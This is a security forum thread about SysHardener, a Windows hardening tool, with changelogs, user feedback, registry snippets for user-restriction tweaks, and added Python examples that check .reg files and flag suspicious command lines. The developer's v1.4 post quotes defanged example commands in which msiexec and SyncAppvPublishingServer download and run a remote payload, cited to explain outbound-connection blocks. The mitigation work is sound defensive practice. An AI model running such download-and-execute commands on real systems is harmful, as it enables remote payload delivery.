SysHardener: Harden Windows Settings

Discussion in 'other anti-malware software' started by novirusthanks, Feb 26, 2018.

  1. Krusty

    Krusty Registered Member

    Joined:
    Feb 3, 2012
    Posts:
    6,789
    Location:
    Among the gum trees
    @Umbra ,

    Very cool! I hadn't seen that option. Thanks. :thumb:
     
  2. mattdocs12345

    mattdocs12345 Registered Member

    Joined:
    Mar 23, 2013
    Posts:
    1,879
    Location:
    US
  3. Hiltihome

    Hiltihome Registered Member

    Joined:
    Jul 5, 2013
    Posts:
    806
    Location:
    Baden Germany
    Suggestion:
    There should be a dot, or a circle, around those checkboxes, that are selected by default, even if they are unchecked.
    This would help troubleshooting.
     
  4. Umbra

    Umbra Registered Member

    Joined:
    Feb 10, 2011
    Posts:
    5,766
    Location:
    Europe then Asia
    @novirusthanks I think the most important option that should be implemented is that SH should create a backup of the user current "setup" before it applies the changes.
     
  5. EASTER

    EASTER Registered Member

    Joined:
    Jul 28, 2007
    Posts:
    8,329
    Location:
    U.S.A. (South)
    That's likely very easily done. It seems a very busy camp in NVT Labs these days.
     
  6. Umbra

    Umbra Registered Member

    Joined:
    Feb 10, 2011
    Posts:
    5,766
    Location:
    Europe then Asia
    yes, and i'm waiting for a GUI version of SOB, maybe in few years :D:argh:
     
  7. mattdocs12345

    mattdocs12345 Registered Member

    Joined:
    Mar 23, 2013
    Posts:
    1,879
    Location:
    US
    A check for updates option from within the software would also be nice. I don't want to go here or to their website every time to check if a new version is available.
     
  8. novirusthanks

    novirusthanks Developer

    Joined:
    Nov 5, 2010
    Posts:
    1,027
    Location:
    Italy
    Released SysHardener v1.3:
    http://www.novirusthanks.org/products/syshardener/

    Changelog:

    + New option "Disable Loading of DLLs via AppInit_DLLs"
    + New option "Load Only Digitally Signed DLLs via AppInit_DLLs"
    + New option "Disable Windows Subsystem for Linux"
    + Improved "Disable PowerShell v2.0 Engine"
    + Added more "blue" icons that can be clicked to get more info
    + Some "orange" icons can be clicked to get more info
    + Reduced height of the main application window
    + Main application window is sizeable and can be maximized
    + Added "Tweaks" option on top main menu to "select all\suggested tweaks\unselect all" tweaks
    + Minor fixes and optimizations
    + Updated help file

    Here is a screenshot:

    syshardener.png

    New text on the help (faqs) file:

    @Umbra

    Added on the todo list.

    @mattdocs12345

    I see there is a confusion about how to restore settings, I'll try to reply to a few questions:

    Q - How to restore settings?

    A - Select only the tweaks you want to reset\restore to their defaults and then click "Restore Selected"

    Q - When I uninstall SysHardener, are all tweaks restored to their defaults?

    A - No, SysHardener just removes its files from your system once it is uninstalled.

    Q - If I want to restore all pre-selected (suggested) tweaks to their defaults, what can I do?

    A - On the top main menu "Tweaks" select "Suggested Tweaks" to select\check all suggested (pre-selected) tweaks. Then click the button "Restore Selected" to restore the selected tweaks to their factory-settings values.

    Basically, the button "Restore Selected" allows you to only reset\restore the selected (checked) tweaks, not all of them.

    Thanks for letting me know.

    Added on the todo list.
     
  9. EASTER

    EASTER Registered Member

    Joined:
    Jul 28, 2007
    Posts:
    8,329
    Location:
    U.S.A. (South)
    And a very Happy EASTER to you Andreas-family, and to all our community connected members and their family at Wilders . Many more and thanks as always. :)
     
    Last edited: Apr 1, 2018
  10. Buddel

    Buddel Registered Member

    Joined:
    Apr 28, 2015
    Posts:
    968
    Thanks for the new version, Andreas. All suggested tweaks applied, no problems here. Happy Easter!:thumb:
     
  11. chrcol

    chrcol Registered Member

    Joined:
    Apr 19, 2006
    Posts:
    897
    Location:
    UK
    excellent product
     
  12. co22

    co22 Registered Member

    Joined:
    Nov 22, 2011
    Posts:
    361
    Location:
    router
    @novirusthanks
    Please consider adding these tweak settings, grabbed from Win7 Manager:
    Disable/Enable Security Tab
    Disable/Enable Folder Options
    Disable Windows features
    Code:
    Windows Registry Editor Version 5.00
    
    [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Programs]
    "NoWindowsFeatures"=dword:00000001
    Enable Windows features
    Code:
    Windows Registry Editor Version 5.00
    
    [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Programs]
    "NoWindowsFeatures"=-
    Prevent from installing devices
    Code:
    Windows Registry Editor Version 5.00
    
    [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\DeviceInstall\Restrictions]
    "DenyUnspecified"=dword:00000001
    Allow installing devices
    Code:
    Windows Registry Editor Version 5.00
    
    [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\DeviceInstall\Restrictions]
    "DenyUnspecified"=-
    Prevent from installing Msi program
    Code:
    Windows Registry Editor Version 5.00
    
    [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
    "DisableMSI"=dword:00000002
    Allow installing Msi program
    Code:
    Windows Registry Editor Version 5.00
    
    [-HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
    
    Disable RegistryTools (regedit.exe regedt32.exe)
    Code:
    Windows Registry Editor Version 5.00
    
    [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
    "DisableRegistryTools"=dword:00000001
    Enable RegistryTools (regedit.exe regedt32.exe)
    Code:
    Windows Registry Editor Version 5.00
    
    [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
    "DisableRegistryTools"=-
    Restrict access over anonymous connections
    Code:
    Windows Registry Editor Version 5.00
    
    [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Control\Lsa]
    "RestrictAnonymous"=dword:00000001
    
    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]
    "RestrictAnonymous"=dword:00000001
    unrestricted access over anonymous connections
    Code:
    Windows Registry Editor Version 5.00
    
    [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Control\Lsa]
    "RestrictAnonymous"=-
    
    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]
    "RestrictAnonymous"=-
    Disable Programs and Features windows uninstaller
    Code:
    Windows Registry Editor Version 5.00
    
    [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Programs]
    "NoProgramsAndFeatures"=dword:00000001
    enable Programs and Features windows uninstaller
    Code:
    Windows Registry Editor Version 5.00
    
    [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Programs]
    "NoProgramsAndFeatures"=-
    Disable Task Manager
    Code:
    Windows Registry Editor Version 5.00
    
    [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
    "DisableTaskMgr"=dword:00000001
    Enable Task Manager
    Code:
    Windows Registry Editor Version 5.00
    
    [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
    "DisableTaskMgr"=-
    some more
    Disable Command Prompt and Bat files
    Code:
    Windows Registry Editor Version 5.00
    
    [HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System]
    "DisableCMD"=dword:00000002
    Enable Command Prompt and Bat files
    Code:
    Windows Registry Editor Version 5.00
    
    [HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System]
    "DisableCMD"=-
    
    Force .DLL unload from memory
    Code:
    Windows Registry Editor Version 5.00
    
    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer]
    "AlwaysUnloadDll"=dword:00000001
    unforce .DLL unload from memory
    Code:
    Windows Registry Editor Version 5.00
    
    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer]
    "AlwaysUnloadDll"=-
    
     
    Last edited: Apr 2, 2018
  13. Hiltihome

    Hiltihome Registered Member

    Joined:
    Jul 5, 2013
    Posts:
    806
    Location:
    Baden Germany
    @co22:
    What you suggest are user restrictions, not security tweaks.

    AV software will flag these as malicious modifications.

    I would not recommend to add these to SysHardener.
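A way to check a registry export for the user-restriction values discussed in the two posts above, shown as an added example that is not part of the thread or of SysHardener. It parses the `.reg` syntax used in those snippets, replays sets and deletions in order, and reports which restriction values remain set; the function names and the merged sample file are constructed for illustration.

```python
import re
# Value names of the user-restriction tweaks posted above (lower-cased).
RESTRICTIONS = {"nowindowsfeatures", "denyunspecified", "disablemsi", "disablecmd",
                "disableregistrytools", "noprogramsandfeatures", "disabletaskmgr"}
KEY_RE = re.compile(r'^\[(-?)(.+)\]$')
VALUE_RE = re.compile(r'^"([^"]+)"=(.*)$')

def parse_reg(text):
    """Yield (key, name, data): data None deletes a value, name None deletes a key."""
    key = None
    for line in map(str.strip, text.splitlines()):
        if m := KEY_RE.match(line):
            key = m.group(2)
            if m.group(1):                    # [-KEY] removes the key and its subtree
                yield key, None, None
                key = None
        elif key and (m := VALUE_RE.match(line)):
            name, raw = m.groups()
            if raw.lower().startswith("dword:"):
                raw = int(raw[6:], 16)        # other value types stay as raw text
            yield key, name, None if raw == "-" else raw

def active_restrictions(text):
    """Replay the file in order; return the restriction values left set to non-zero."""
    state = {}
    for key, name, data in parse_reg(text):
        k = key.lower()
        if name is None:
            state = {p: v for p, v in state.items()
                     if p[0] != k and not p[0].startswith(k + "\\")}
        elif data is None:
            state.pop((k, name.lower()), None)
        else:
            state[(k, name.lower())] = (key, name, data)
    return sorted(v for v in state.values()
                  if v[1].lower() in RESTRICTIONS and isinstance(v[2], int) and v[2])

# Constructed sample: entries from the post above merged into one file.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableTaskMgr"=dword:00000001
"DisableRegistryTools"=dword:00000001
"DisableRegistryTools"=-
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
"DisableMSI"=dword:00000002
[-HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
[HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System]
"DisableCMD"=dword:00000002
"""
```

On the sample, only `DisableTaskMgr` and `DisableCMD` are reported: `DisableRegistryTools` is deleted again by its `"name"=-` line and `DisableMSI` disappears with the `[-KEY]` deletion.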
     
  14. co22

    co22 Registered Member

    Joined:
    Nov 22, 2011
    Posts:
    361
    Location:
    router
    :thumb: I know I can apply them all with one click, but I'd like to see it in SysHardener.
    It could be added as a user restriction tab. It may be useful to someone.
    Anyway, thanks for your comment.
     
  15. amico81

    amico81 Registered Member

    Joined:
    Oct 18, 2017
    Posts:
    71
    Location:
    Germany
    when is it planned to release other languages?
     
  16. novirusthanks

    novirusthanks Developer

    Joined:
    Nov 5, 2010
    Posts:
    1,027
    Location:
    Italy
    @amico81

    We may add multilingual support on next versions, no ETA for now.

    @co22

    Thanks for the suggestions, very welcome.

    Personally I agree with @Hiltihome that those changes are more user restrictions and not security tweaks.

    We may not add them to SysHardener, maybe on a new\future program that is focused on user restrictions\privacy tweaks only.
     
  17. chrcol

    chrcol Registered Member

    Joined:
    Apr 19, 2006
    Posts:
    897
    Location:
    UK
    Not to mention at least some of those are obsolete tweaks found on junk tweaker sites.
     
  18. imuade

    imuade Registered Member

    Joined:
    Aug 4, 2016
    Posts:
    685
    Location:
    Italy
    I've just tried this nice piece of SW and I really like it, but I'd have a suggestion, if you don't mind.
    By default, only the currently active options should be enabled.
    For example, I have the geolocation service disabled, but when I open SysHardener the option "Turn off geolocation service" is unticked.
    What do you think?
     
  19. shadek

    shadek Registered Member

    Joined:
    Feb 26, 2008
    Posts:
    2,538
    Location:
    Sweden
    I agree. This has bugged me too from time to time.
     
  20. JoWazzoo

    JoWazzoo Registered Member

    Joined:
    Nov 11, 2008
    Posts:
    241
    Location:
    Ether
    SH 1.3

    I added

    Tweaks
    Suggested
    Apply

    Green Bar started moving across and then
    create Restore Point popped up.

    I accepted Yes, but wondered ... with the green bar moving had some tweaks been turned on before the creation of the Restore Point?
    This is a bit disconcerting.
     
  21. Umbra

    Umbra Registered Member

    Joined:
    Feb 10, 2011
    Posts:
    5,766
    Location:
    Europe then Asia
    Just in case of issues.

    it shouldn't, from what i remember the changes came after.
     
  22. novirusthanks

    novirusthanks Developer

    Joined:
    Nov 5, 2010
    Posts:
    1,027
    Location:
    Italy
    Released SysHardener v1.4:
    http://www.novirusthanks.org/products/syshardener/

    Here is the changelog:

    + New option "Block Outbound Connections for SyncAppvPublishing.exe" (checked)
    + New option "Block Outbound Connections for Certutil.exe" (checked)
    + New option "Block Outbound Connections for Msiexec.exe" (unchecked)
    + New option "Block Outbound Connections for Odbcconf.exe" (checked)
    + New option "Block Outbound Connections for AtBroker.exe" (checked)
    + "Block Outbound Connections for Csrss.exe" is checked
    + Added button "Windows Updates" on "System Tools" tab
    + Move progress bar after asking-for\creating restore point
    + Updated help file

    Just a quick update to mitigate:

    CertUtil.exe Could Allow Attackers To Download Malware While Bypassing AV
    https://www.bleepingcomputer.com/ne...ckers-to-download-malware-while-bypassing-av/
    * Tweak: "Block Outbound Connections for Certutil.exe"

    Msiexec.exe could allow attackers to download and execute a remote payload
    Example: cmd.exe /c msiexec /q /I "hxxp://127.0.0.1/payload.msi"
    * Tweak: "Block Outbound Connections for Msiexec.exe"

    SyncAppvPublishing.exe could allow attackers to download and execute a remote payload
    Example: SyncAppvPublishingServer.exe ".; *DownloadFile() or DownloadString() or Start-Process mshta.exe hxxp://127.0.0.1/payload.hta"
    * Tweak: "Block Outbound Connections for SyncAppvPublishingServer.exe"

    @JoWazzoo

    Even if the green bar was moving it was just creating the restore point, tweaks are applied only after the question\creation of restore point.

    Now the progressbar moves after the question\creation of restore point to avoid confusions.

    @imuade

    I saved your suggestion.
     
    Last edited: Apr 5, 2018
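Detection logic for the behaviour the v1.4 post above mitigates, shown as an added example that is not part of the thread or of SysHardener: it flags process command lines in which one of the binaries named in the post is given a URL. The function names, the watch list as a tuple, and all sample lines except the first are constructed for illustration.

```python
import re

# Binaries the v1.4 post describes as able to download a remote payload.
WATCHED = ("certutil", "msiexec", "syncappvpublishingserver")

# A watched name as its own token: optional directory prefix, optional .exe.
BINARY_RE = re.compile(
    r'(?<![\w.\-])(?:[^\s"]*[\\/])?(' + "|".join(WATCHED) + r')(?:\.exe)?(?![\w.\-])',
    re.IGNORECASE,
)
# http(s) URLs, plus the defanged hxxp(s) form used in the post.
URL_RE = re.compile(r'\b(?:https?|hxxps?)://[^\s"\']+', re.IGNORECASE)


def check_command_line(cmdline):
    """Return (binary, urls) when a watched binary is run with a URL, else None."""
    urls = URL_RE.findall(cmdline)
    if not urls:
        return None
    # Blank out URLs first, so a watched name inside a URL path
    # (.../certutil.exe) is not mistaken for the program being run.
    match = BINARY_RE.search(URL_RE.sub(" ", cmdline))
    if match is None:
        return None
    return match.group(1).lower(), urls


def scan(events):
    """Return (line_number, binary, urls) for every flagged command line."""
    hits = []
    for number, line in enumerate(events, start=1):
        result = check_command_line(line)
        if result:
            hits.append((number, *result))
    return hits


# Constructed process-creation command lines; line 1 is the example from the post.
SAMPLE_EVENTS = [
    'cmd.exe /c msiexec /q /I "hxxp://127.0.0.1/payload.msi"',
    r'"C:\Windows\System32\msiexec.exe" /i C:\installers\app.msi /qn',
    r'C:\Windows\System32\certutil.exe -hashfile C:\iso\image.iso SHA256',
    r'C:\Windows\SysWOW64\CertUtil.exe hxxp://192.0.2.10/file.bin',  # other arguments omitted
    r'C:\tools\fetch.exe hxxp://192.0.2.10/certutil.exe',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit)
```

Local installs and hash checks (lines 2 and 3) pass, and line 5 is not flagged because the watched name appears only inside the URL.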
  23. Buddel

    Buddel Registered Member

    Joined:
    Apr 28, 2015
    Posts:
    968
    Not really a problem here. However, now that SysHardener is installed on my machine (only suggested tweaks applied) boot time has considerably increased (a couple of minutes instead of only approximately one and a half minutes). Is there a tweak that can be disabled, so that boot time goes back to normal? Thanks for your help in advance.

    PS: Maybe it's got something to do with the fact that both OSArmor AND SysHardener are installed here. Should I use one OR the other, or is it OK to use both programs on the same computer? Wouldn't it be just enough to use OSArmor?
     
    Last edited: Apr 6, 2018
  24. Charyb

    Charyb Registered Member

    Joined:
    Jan 16, 2013
    Posts:
    664
    What I don't care for is if I view the suggested tweaks or check all or uncheck all, it changes the Settings.ini file without hitting the apply settings button. This causes all my settings to be lost. What I have done is set my options then rename the copy of the Settings.ini file so I am able to keep my settings. I don't know why the configuration file has to change since I do not hit the apply settings button.

    Please include the option to retain custom settings.

    Until then, I will continue to rename the Settings.ini file.
     

    Last edited: Apr 6, 2018
  25. shadek

    shadek Registered Member

    Joined:
    Feb 26, 2008
    Posts:
    2,538
    Location:
    Sweden
    Same here mate! I backup my settings because SysHardener won't remember the settings once I check a new box when I re-open it the next time.

    2018-04-06.png
     